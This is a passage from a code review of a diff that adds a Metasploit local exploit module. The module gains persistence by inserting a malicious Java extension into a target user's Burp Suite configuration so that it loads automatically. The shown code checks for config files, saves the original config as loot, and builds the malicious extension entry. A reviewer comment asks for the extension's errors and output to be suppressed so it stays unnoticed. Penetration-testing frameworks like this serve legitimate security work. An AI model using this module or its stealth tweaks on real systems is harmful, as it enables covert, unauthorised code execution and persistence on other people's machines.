modules/exploits/multi/local/burp_extension_persistence.rb

```diff
@@ -0,0 +1,411 @@
+              'Payload' =>
+                              { 'Space' => 8_191 - 'cmd.exe /c '.length }
+            }
+          ],
+        ],
+        'Actions' => [
+          ['precompiled', { 'Description' => 'Utilized pre-compiled bytecode' }],
+          ['build', { 'Description' => 'Build the extension locally with Gradle' }]
+        ],
+        'DefaultAction' => 'precompiled',
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options([
+      OptString.new('NAME', [ false, 'Name of the extension', '' ]),
+      OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write the extension']),
+      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
+    ])
+    register_advanced_options([
+      OptString.new('GRADLE', [ false, 'Gradle executable', '/usr/bin/gradle' ]),
+    ])
+  end
+
+  def extension_name_generator
+    return datastore['NAME'] unless datastore['NAME'].blank?
+
+    rand_text_alphanumeric(4..10)
+  end
+
+  def check
+    if action.name == 'build'
+      if File.exist?(datastore['GRADLE'])
+        vprint_good('Gradle found')
+      else
+        CheckCode::Safe('Gradle is required on THE METASPLOIT computer, please install.')
+      end
+    end
+
+    configs = get_configs_from_settings
+    configs.each do |config|
+      if file?(config)
+        print_status("Found config: #{config}")
+      else
+        print_status("Config mentioned in settings, but not found: #{config}")
+      end
+    end
+
+    print_bad('User has no saved configs in their settings') if configs.empty?
+
+    if datastore['config'].blank?
+      return CheckCode::Detected('No config file listed, only writing plugin to disk')
+    elsif file?(datastore['config'])
+      return CheckCode::Detected("Config file found: #{datastore['config']}")
+    end
+
+    CheckCode::Safe("Config file not found: #{datastore['config']}")
+  end
+
+  def add_extension(settings_file, extension_location, extension_name)
+    # open file
+    config_contents = read_file(settings_file)
+    # store as loot for backup purposes
+    path = store_loot('burp.config.json', 'application/json', session, config_contents, nil, nil)
+    print_good("Config file saved in: #{path}")
+    # read json
+    begin
+      config_contents = JSON.parse(config_contents)
+    rescue JSON::ParserError
+      fail_with(Failure::Unknown, "Failed to parse json config file: #{settings_file}")
+    end
+    malicious_extension = {
+      'errors' => 'ui',
+      'extension_file' => extension_location,
+      'extension_type' => 'java',
+      'loaded' => true,
+      'name' => extension_name,
+      'output' => 'ui'
```

Comment:
Can't the errors and the output be explicitly set to ignore/null/… to ensure that weird logs won't show up in Burp?